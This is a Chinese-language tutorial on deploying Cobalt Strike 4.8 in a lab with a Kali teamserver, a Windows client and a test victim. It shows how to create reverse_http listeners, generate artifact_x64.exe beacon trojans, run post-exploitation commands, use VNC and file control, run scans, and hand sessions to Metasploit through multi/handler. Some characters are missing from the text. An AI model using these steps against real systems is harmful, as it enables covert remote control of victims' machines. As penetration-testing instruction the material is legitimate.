一、Cobalt strike介绍

Cobalt Strike是⼀款美国Red Team开发的渗透测试神器。这个⼯具成为了渗透测试中不可缺少的利器。其拥有多种协议主机上线⽅式，集成了提权，凭据导出，端⼝转发，socket代理，office攻击，⽂件捆绑，钓⻥等功能。同时，Cobalt Strike还可以调⽤Mimikatz等其他知名⼯具，因此⼴受⿊客喜爱。
Cobalt Strike它分为客户端与服务端，服务端是⼀个，客户端可以有多个，可被团队进⾏分布式协团操作。当然还有⼀点就是这款⼯具主要⽤于内⽹渗透以及APT攻击。

项目官网 :Cobalt strike
部署要求：

C/S	系统	配置	备注
服务端	Linux	2C4G 硬盘40G+	使用kali系统
客户端	Windows	2C4G 硬盘60G+	使用Windows 10系统
靶机	Windows	2C4G 硬盘60G+	使用Windows 7/10系统，资源足够就开启一个靶机（可选）

二、安装步骤

2.1、Server端部署

1. 启动kali，使用 root 用户登录，把cobaltstrike放进去（以CS4.8为例）
   
   执行解压指令

unzip CS4.8.zip

2. 进入 到CS4.8的服务器 录中，先赋予服务端权限，然后启动服务端

cd Server
chmod +x teamserver
chmod +x TeamServerImage
#启动teamserver（服务端）IP地址为kali的地址，hacker为连接密
./teamserver 192.168.152.154 hacker

启动之后可以看到默认端口 是50050， 前因为CS 为 知，所以说这个端 在各个厂商得安全设备里 都进了名单，所以实际作中一般是不会到这个默认端口 。修改端 要在配置 件中去修改（teamserver）

如果不使用默认端口，修改此处。

2.2、Client端部署

Windows 10虚拟机中，需要先安装好JDK 21，客户端启动的程序依赖于java环境。

打开Client文件夹，双击Cobalt_Strike_CN.bat，启动后会弹出一个cmd的窗口，这个不能关掉，连接页面需要填入的信息：

- Host：Server端的IP
- Port：Server端的端口
- User：自定义
- Password：Server端启动时设置的密码

三、演示案例

3.1、生成.exe木马文件

1. 首先设置监听

reverse_http 表示反向（反射）即别人 主动来连我
beacon_bind 表示正向（本地）即我们去连接别

-  Name：自定义的一个链接名称
- Payload：选择载荷的模式
- HTTP HOSTS：选择Server端的IP
- HTTP Host（Stager）：选择Server端的IP
- HTTP Port（C2）：自定义的Client端端口，不要与本机的端口冲突

监听器添加成功

监听器与木马详解：cobaltstrike之创建监听器与生成后门

2. 生成木马

Windows Executable和Windows Executable(S) 的区别：
Windows Executable：带注册表和服务的木马 ，运行在服务器上，即使服务器重启也可以再次控制。
Windows Executable(S) ：无行为动作，无状态木马 ，运行在内存中，服务器重启之后无法二次上线，优点是容易过杀毒软件。

【有效载荷】-【Windows可执行程序】


点击【Generate】，选择artifact_x64.exe保存在桌面

3. 在桌面上点击artifact_x64.exe运行，CS监听即可上线
   
4. 运行后是不会产生弹窗的，在CS的Client端可以看见主机已经上线。如果在局域网的其他机器运行该木马，那就会上线对应的机器。
   

3.2、木马上线之后的基本功能及操作

1. 右键，点击【会话交互】进入 beacon命令 ，可执行相关命令
   

# 改变连接的时间延时为1s
sleep 1

#CS中执行 shell命令需要在命令前 加上shell开头
# 查看当前用户
shell whoami

# 查看靶机IP
shell ipconfig

# 查看靶机当前的目录
shell dir

2. 远程VNC及文 件管理，右键上线的靶机 -【浏览探测】-【VNC桌面交互】

3. 选择文件管理功能，可远程管理目标服务器文件(上传和下载) ，右键上线靶机，选择【浏览探测】-【文件浏览】
   
   
4. 网络探测(检查当前局域 的共享主机)和端 扫描、进程列表

网络探测：检查当前局域 的共享主机，如果存在共享的话会在列表中显示出来
可在“视图”“目 标列表”选项中查看探测到的主机信息

5. 端口扫描，右键上线靶机，选择【浏览探测】-【端口扫描】

arp协议:属于数据链路层的协议，利用时很难被防火墙检测和发现；
icpm协议：属于ping协议，很难被检测发现。

6. 进程列表，右键上线靶机，选择【浏览探测】-【进程列表】

可查看目 标服务器的进程，kill杀死相关进程，或者进 token值伪造等等~功能 较强

四、CS插件安装

1. 打开工 具包中的cs插件 件夹，解压放到电脑固定的路径
   

2. 点击CS界面 的“脚本管理器”
   

3. 点击脚本管理器下方 的“load”添加插件
   
   状态栏出现“✔”表示插件添加正常。

添加完插件之后的状态，如下图

五、CS和MSF联动

1. 在kali中启动msf

msfconsole

2. 使用 CS创建 个Foreign HTTP的监听。其中ip地址为MSF的ip地址，端口自定义，右键上线的靶机 - 【凭证提权】-【新建会话】
   
   【Add】- name自定义【MSF】- Payload选择【Foreign HTTP】- HTTP Host填写【kali的IP】- HTTP Port填写自定义端口【31210】-【Save】
   

3. MSF中设置监听

#选择工具
use exploit/multi/handler
#设置监听的会话（注意会话类型要和CS的会话一致）
set payload windows/meterpreter/reverse_http
#设置IP地址（IP地址为kali的监听的机器的IP地址，和CS中保持一 致）
set lhost 192.168.152.154
#设置端口 （和CS中 定义的端 保持 致）
set lport 31210
# 开始监听
run

选择我们添加好的【MSF】会话。

选择完成之后，MSF就可以收到监听进入会话窗 了，CS成功和MSF实现联动。